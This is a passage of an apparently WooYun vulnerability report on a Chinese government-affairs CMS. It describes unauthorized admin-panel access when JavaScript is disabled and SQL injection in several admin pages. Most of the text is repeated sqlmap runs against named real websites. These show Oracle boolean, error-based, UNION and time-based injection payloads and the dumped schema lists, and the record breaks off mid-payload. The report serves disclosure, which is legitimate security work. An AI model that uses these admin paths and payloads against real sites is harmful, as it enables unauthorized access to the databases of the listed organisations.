当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115835

漏洞标题:瑞合信政务类cms 未授权访问导致sql注入打包 #2

相关厂商:瑞合信网络科技

漏洞作者: Hero

提交时间:2015-05-25 23:26

修复时间:2015-08-28 00:56

公开时间:2015-08-28 00:56

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-25: 细节已通知厂商并且等待厂商处理中
2015-05-30: 厂商已经确认,细节仅向厂商公开
2015-06-02: 细节向第三方安全合作伙伴开放
2015-07-24: 细节向核心白帽子及相关领域专家公开
2015-08-03: 细节向普通白帽子公开
2015-08-13: 细节向实习白帽子公开
2015-08-28: 细节向公众公开

简要描述:

sql注入等问题

详细说明:

WooYun: 瑞合信政务类cms SA权限注射打包
官方网站:http://www.rhxwl.com/Server.asp
案例:案例:http://www.linhaihome.com/
http://jh.zjmy.net/
http://www.lqmyjj.com/
http://www.sxjhjj.com/
http://www.sxkfqjj.com/
http://www.sxpjgtmyjj.com/
http://www.wlmyjj.com/
http://jh.zjmy.net/
http://www.hyqmyjj.com/
http://www.jjmyjj.com/
http://www.yhmyjj.com/
http://www.ttmyjj.com/
http://www.xjmyjj.com/
http://www.lqmyjj.com
过程: 浏览器禁用了js之后,导致后台未授权访问,可随意操作

1.jpg


admin_manage/cp/Manage_cp.asp
admin_manage/xhzl/Manage.asp
admin_manage/zczc/Manage.asp
admin_manage/ybry/Manage.asp
admin_manage/xsqy/Manage.asp
admin_manage/system/Manage.asp
admin_manage/tbtj11/manage.asp
...
详细说明以此为例:http://jh.zjmy.net/
未授权访问证明

2.jpg


3.jpg


SQL注入:
#1
http://jh.zjmy.net/admin_manage/system/mg_editwz.asp?lb=save&id=241

[root@Hacker~]# Sqlmap -u "http://jh.zjmy.net/admin_manage/system/mg_editwz.asp?
lb=save&id=241" --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 07:13:44
[07:13:44] [INFO] resuming back-end DBMS 'oracle'
[07:13:44] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: lb=save&id=241 AND 5686=5686
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: lb=save&id=241 AND 9249=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR
(114)||CHR(118)||CHR(99)||CHR(58)||(SELECT (CASE WHEN (9249=9249) THEN 1 ELSE 0
END) FROM DUAL)||CHR(58)||CHR(113)||CHR(104)||CHR(117)||CHR(58)||CHR(62))) FROM
DUAL)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: lb=save&id=-4202 UNION ALL SELECT NULL, NULL, CHR(58)||CHR(114)||CH
R(118)||CHR(99)||CHR(58)||CHR(98)||CHR(88)||CHR(74)||CHR(110)||CHR(102)||CHR(111
)||CHR(78)||CHR(118)||CHR(115)||CHR(71)||CHR(58)||CHR(113)||CHR(104)||CHR(117)||
CHR(58) FROM DUAL--
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: lb=save&id=241 AND 4485=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(86)|
|CHR(90)||CHR(117),5)
---
[07:13:44] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
[07:13:44] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[07:13:44] [INFO] fetching database (schema) names
[07:13:44] [INFO] the SQL query used returns 25 entries
available databases [25]:
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB
[*] ZJGSXH
[07:13:45] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[07:13:45] [INFO] fetched data logged to text files under 'C:\tools\????\SQLMAP~
3\Bin\output\jh.zjmy.net'
[*] shutting down at 07:13:45


#1.jpg


#2
http://jh.zjmy.net/admin_manage/xhzl/mg_edithy.asp?id=3278&page=1&title=1&lx=%D0%AD%BB%E1%BC%F2%B1%A8

[root@Hacker~]# Sqlmap -u "http://jh.zjmy.net/admin_manage/xhzl/mg_edithy.asp?id
=3278&page=1&title=1&lx=%D0%AD%BB%E1%BC%F2%B1%A8" --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 07:15:16
[07:15:16] [INFO] resuming back-end DBMS 'oracle'
[07:15:16] [INFO] testing connection to the target url
[07:15:16] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=3278 AND 9710=9710&page=1&title=1&lx=????
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: id=3278 AND 5303=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(118)||
CHR(99)||CHR(113)||CHR(58)||(SELECT (CASE WHEN (5303=5303) THEN 1 ELSE 0 END) FR
OM DUAL)||CHR(58)||CHR(119)||CHR(109)||CHR(114)||CHR(58)||CHR(62))) FROM DUAL)&p
age=1&title=1&lx=????
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: id=-4200 UNION ALL SELECT NULL, CHR(58)||CHR(118)||CHR(99)||CHR(113
)||CHR(58)||CHR(110)||CHR(109)||CHR(115)||CHR(65)||CHR(70)||CHR(115)||CHR(101)||
CHR(119)||CHR(120)||CHR(99)||CHR(58)||CHR(119)||CHR(109)||CHR(114)||CHR(58), NUL
L, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM DUAL-- &page=1&title=1&lx
=????
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=3278 AND 5184=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(106)||CHR(
101)||CHR(65),5)&page=1&title=1&lx=????
---
[07:15:16] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
[07:15:16] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[07:15:16] [INFO] fetching database (schema) names
[07:15:17] [INFO] the SQL query used returns 25 entries
available databases [25]:
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB
[*] ZJGSXH
[07:15:17] [INFO] fetched data logged to text files under 'C:\tools\SQLMAP~1\SQL
MAP~1\Bin\output\jh.zjmy.net'


#2.jpg


#3
http://jh.zjmy.net/admin_manage/cp/gq_edit.asp?id=35111&cz=&page=1

[root@Hacker~]# Sqlmap -u "http://jh.zjmy.net/admin_manage/cp/gq_edit.asp?id=351
11&cz=&page=1" --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 07:16:45
[07:16:45] [INFO] resuming back-end DBMS 'oracle'
[07:16:45] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=35111' AND 6782=6782 AND 'AORJ'='AORJ&cz=&page=1
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: id=35111' AND 7435=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(97)|
|CHR(113)||CHR(100)||CHR(58)||(SELECT (CASE WHEN (7435=7435) THEN 1 ELSE 0 END)
FROM DUAL)||CHR(58)||CHR(106)||CHR(111)||CHR(117)||CHR(58)||CHR(62))) FROM DUAL)
AND 'sPGU'='sPGU&cz=&page=1
Type: UNION query
Title: Generic UNION query (NULL) - 50 columns
Payload: id=-8412' UNION ALL SELECT NULL, NULL, CHR(58)||CHR(97)||CHR(113)||
CHR(100)||CHR(58)||CHR(117)||CHR(119)||CHR(119)||CHR(88)||CHR(110)||CHR(89)||CHR
(103)||CHR(106)||CHR(115)||CHR(113)||CHR(58)||CHR(106)||CHR(111)||CHR(117)||CHR(
58), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL
L, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, N
ULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM DUAL-- &cz=&page=1
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=35111' AND 2969=DBMS_PIPE.RECEIVE_MESSAGE(CHR(103)||CHR(77)||CHR
(82)||CHR(105),5) AND 'SzOc'='SzOc&cz=&page=1
---
[07:16:45] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
[07:16:45] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[07:16:45] [INFO] fetching database (schema) names
[07:16:45] [INFO] the SQL query used returns 25 entries
available databases [25]:
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB
[*] ZJGSXH
[07:16:46] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[07:16:46] [INFO] fetched data logged to text files under 'C:\tools\????\SQLMAP~
3\Bin\output\jh.zjmy.net'
[*] shutting down at 07:16:46


#3.jpg


#4
http://jh.zjmy.net/admin_manage/zczc/mg_edithy.asp?id=45910&page=1&title=1&lx=--&mc=

[root@Hacker~]# Sqlmap -u "http://jh.zjmy.net/admin_manage/zczc/mg_edithy.asp?id
=45910&page=1&title=1&lx=--&mc=" --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 07:19:07
[07:19:07] [INFO] resuming back-end DBMS 'oracle'
[07:19:07] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=45910 AND 1182=1182&page=1&title=1&lx=--&mc=
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: id=45910 AND 1583=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(116)|
|CHR(108)||CHR(112)||CHR(58)||(SELECT (CASE WHEN (1583=1583) THEN 1 ELSE 0 END)
FROM DUAL)||CHR(58)||CHR(105)||CHR(121)||CHR(114)||CHR(58)||CHR(62))) FROM DUAL)
&page=1&title=1&lx=--&mc=
Type: UNION query
Title: Generic UNION query (NULL) - 15 columns
Payload: id=-4007 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL,
NULL, NULL, CHR(58)||CHR(116)||CHR(108)||CHR(112)||CHR(58)||CHR(100)||CHR(103)|
|CHR(89)||CHR(73)||CHR(65)||CHR(120)||CHR(113)||CHR(83)||CHR(70)||CHR(78)||CHR(5
8)||CHR(105)||CHR(121)||CHR(114)||CHR(58), NULL, NULL, NULL, NULL, NULL FROM DUA
L-- &page=1&title=1&lx=--&mc=
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=45910 AND 4688=DBMS_PIPE.RECEIVE_MESSAGE(CHR(97)||CHR(102)||CHR(
86)||CHR(115),5)&page=1&title=1&lx=--&mc=
---
[07:19:07] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
[07:19:07] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[07:19:07] [INFO] fetching database (schema) names
[07:19:07] [INFO] the SQL query used returns 25 entries
available databases [25]:
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB
[*] ZJGSXH
[07:19:07] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[07:19:07] [INFO] fetched data logged to text files under 'C:\tools\????\SQLMAP~
3\Bin\output\jh.zjmy.net'
[*] shutting down at 07:19:07


#4.jpg


#5
http://jh.zjmy.net/admin_manage/zczc/mg_editwz.asp?id=475&page=1&title=&mc=%D3%D1%C7%E9%C1%B4%BD%D3&ljlx=

[root@Hacker~]# Sqlmap -u "http://jh.zjmy.net/admin_manage/zczc/mg_editwz.asp?id
=475&page=1&title=&mc=%D3%D1%C7%E9%C1%B4%BD%D3&ljlx=" --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 07:20:47
[07:20:48] [INFO] resuming back-end DBMS 'oracle'
[07:20:48] [INFO] testing connection to the target url
[07:20:48] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=475 AND 6601=6601&page=1&title=&mc=????????&ljlx=
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: id=475 AND 9996=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(109)||C
HR(114)||CHR(97)||CHR(58)||(SELECT (CASE WHEN (9996=9996) THEN 1 ELSE 0 END) FRO
M DUAL)||CHR(58)||CHR(113)||CHR(112)||CHR(106)||CHR(58)||CHR(62))) FROM DUAL)&pa
ge=1&title=&mc=????????&ljlx=
Type: UNION query
Title: Generic UNION query (NULL) - 10 columns
Payload: id=-1476 UNION ALL SELECT NULL, NULL, CHR(58)||CHR(109)||CHR(114)||
CHR(97)||CHR(58)||CHR(86)||CHR(79)||CHR(65)||CHR(106)||CHR(102)||CHR(114)||CHR(1
16)||CHR(118)||CHR(111)||CHR(101)||CHR(58)||CHR(113)||CHR(112)||CHR(106)||CHR(58
), NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM DUAL-- &page=1&title=&mc=??????
??&ljlx=
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=475 AND 2336=DBMS_PIPE.RECEIVE_MESSAGE(CHR(121)||CHR(119)||CHR(1
08)||CHR(80),5)&page=1&title=&mc=????????&ljlx=
---
[07:20:48] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
[07:20:48] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[07:20:48] [INFO] fetching database (schema) names
[07:20:48] [INFO] the SQL query used returns 25 entries
available databases [25]:
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB
[*] ZJGSXH
[07:20:48] [INFO] fetched data logged to text files under 'C:\tools\SQLMAP~1\SQL
MAP~1\Bin\output\jh.zjmy.net'
[*] shutting down at 07:20:48


#5.jpg


#6
http://jh.zjmy.net/admin_manage/ybry/mg_edithy.asp?id=22325&page=1&title=1&lx=0050002&mc=%B9%A4%D7%F7%D1%A7%CF%B0

[root@Hacker~]# Sqlmap -u "http://jh.zjmy.net/admin_manage/ybry/mg_edithy.asp?id
=22325&page=1&title=1&lx=0050002&mc=%B9%A4%D7%F7%D1%A7%CF%B0" --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 07:22:02
[07:22:02] [INFO] resuming back-end DBMS 'oracle'
[07:22:02] [INFO] testing connection to the target url
[07:22:02] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=22325 AND 7867=7867&page=1&title=1&lx=0050002&mc=??????
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: id=22325 AND 1661=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(101)|
|CHR(122)||CHR(99)||CHR(58)||(SELECT (CASE WHEN (1661=1661) THEN 1 ELSE 0 END) F
ROM DUAL)||CHR(58)||CHR(113)||CHR(106)||CHR(112)||CHR(58)||CHR(62))) FROM DUAL)&
page=1&title=1&lx=0050002&mc=??????
Type: UNION query
Title: Generic UNION query (NULL) - 15 columns
Payload: id=-7148 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL,
CHR(58)||CHR(101)||CHR(122)||CHR(99)||CHR(58)||CHR(118)||CHR(103)||CHR(80)||CHR
(122)||CHR(69)||CHR(120)||CHR(102)||CHR(79)||CHR(86)||CHR(83)||CHR(58)||CHR(113)
||CHR(106)||CHR(112)||CHR(58), NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM DUA
L-- &page=1&title=1&lx=0050002&mc=??????
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=22325 AND 8726=DBMS_PIPE.RECEIVE_MESSAGE(CHR(85)||CHR(109)||CHR(
114)||CHR(68),5)&page=1&title=1&lx=0050002&mc=??????
---
[07:22:02] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
[07:22:02] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[07:22:02] [INFO] fetching database (schema) names
[07:22:02] [INFO] the SQL query used returns 25 entries
available databases [25]:
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB
[*] ZJGSXH
[07:22:03] [INFO] fetched data logged to text files under 'C:\tools\????\SQLMAP~
3\Bin\output\jh.zjmy.net'
[*] shutting down at 07:22:03


#6.jpg


#7
http://jh.zjmy.net/admin_manage/xsqy/mg_edithy.asp?id=1907&page=1&title=1&lx=%BB%E1%D4%B1%B7%E7%B2%C9

[root@Hacker~]# Sqlmap -u "http://jh.zjmy.net/admin_manage/xsqy/mg_edithy.asp?id
=1907&page=1&title=1&lx=%BB%E1%D4%B1%B7%E7%B2%C9" --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 07:23:17
[07:23:17] [INFO] resuming back-end DBMS 'oracle'
[07:23:17] [INFO] testing connection to the target url
[07:23:17] [WARNING] the web server responded with an HTTP error code (500) whic
h could interfere with the results of the tests
[07:23:17] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1907 AND 7746=7746&page=1&title=1&lx=??????
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: id=1907 AND 5282=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(108)||
CHR(101)||CHR(110)||CHR(58)||(SELECT (CASE WHEN (5282=5282) THEN 1 ELSE 0 END) F
ROM DUAL)||CHR(58)||CHR(105)||CHR(113)||CHR(117)||CHR(58)||CHR(62))) FROM DUAL)&
page=1&title=1&lx=??????
Type: UNION query
Title: Generic UNION query (NULL) - 12 columns
Payload: id=-5272 UNION ALL SELECT NULL, NULL, NULL, CHR(58)||CHR(108)||CHR(
101)||CHR(110)||CHR(58)||CHR(109)||CHR(85)||CHR(105)||CHR(118)||CHR(89)||CHR(83)
||CHR(100)||CHR(115)||CHR(113)||CHR(116)||CHR(58)||CHR(105)||CHR(113)||CHR(117)|
|CHR(58), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM DUAL-- &page=1&tit
le=1&lx=??????
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: id=1907 AND 1792=DBMS_PIPE.RECEIVE_MESSAGE(CHR(86)||CHR(89)||CHR(99
)||CHR(107),5)&page=1&title=1&lx=??????
---
[07:23:17] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
[07:23:17] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[07:23:17] [INFO] fetching database (schema) names
[07:23:18] [INFO] the SQL query used returns 25 entries
available databases [25]:
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB
[*] ZJGSXH
[07:23:18] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 1 times
[07:23:18] [INFO] fetched data logged to text files under 'C:\tools\????\SQLMAP~
3\Bin\output\jh.zjmy.net'
[*] shutting down at 07:23:18


#7.jpg


其他案例证明:
http://www.linhaihome.com/admin_manage/system/mg_editwz.asp?lb=save&id=241

[root@Hacker~]# Sqlmap -u "http://www.linhaihome.com/admin_manage/system/mg_edit
wz.asp?lb=save&id=241" --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 07:27:06
[07:27:06] [INFO] resuming back-end DBMS 'oracle'
[07:27:06] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: lb=save&id=241 AND 6573=6573
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: lb=save&id=241 AND 3125=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR
(120)||CHR(106)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (3125=3125) THEN 1 ELSE 0
END) FROM DUAL)||CHR(58)||CHR(115)||CHR(114)||CHR(102)||CHR(58)||CHR(62))) FROM
DUAL)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: lb=save&id=-5471 UNION ALL SELECT NULL, NULL, CHR(58)||CHR(120)||CH
R(106)||CHR(98)||CHR(58)||CHR(74)||CHR(84)||CHR(118)||CHR(97)||CHR(72)||CHR(78)|
|CHR(90)||CHR(106)||CHR(81)||CHR(87)||CHR(58)||CHR(115)||CHR(114)||CHR(102)||CHR
(58) FROM DUAL--
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: lb=save&id=241 AND 7336=DBMS_PIPE.RECEIVE_MESSAGE(CHR(72)||CHR(105)
||CHR(99)||CHR(76),5)
---
[07:27:07] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
[07:27:07] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[07:27:07] [INFO] fetching database (schema) names
[07:27:07] [INFO] the SQL query used returns 25 entries
available databases [25]:
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] WKSYS
[*] WMSYS
[*] XDB
[*] ZJGSXH
[07:27:07] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[07:27:07] [INFO] fetched data logged to text files under 'C:\tools\????\SQLMAP~
3\Bin\output\www.linhaihome.com'
[*] shutting down at 07:27:07


http://www.lqmyjj.com//admin_manage/system/mg_editwz.asp?lb=save&id=241

[root@Hacker~]# Sqlmap -u "http://www.lqmyjj.com//admin_manage/system/mg_editwz.
asp?lb=save&id=241" --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 07:29:17
[07:29:18] [INFO] resuming back-end DBMS 'oracle'
[07:29:18] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: lb=save&id=241 AND 8083=8083
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: lb=save&id=241 AND 2858=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR
(111)||CHR(114)||CHR(98)||CHR(58)||(SELECT (CASE WHEN (2858=2858) THEN 1 ELSE 0
END) FROM DUAL)||CHR(58)||CHR(108)||CHR(105)||CHR(112)||CHR(58)||CHR(62))) FROM
DUAL)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: lb=save&id=-9735 UNION ALL SELECT NULL, NULL, CHR(58)||CHR(111)||CH
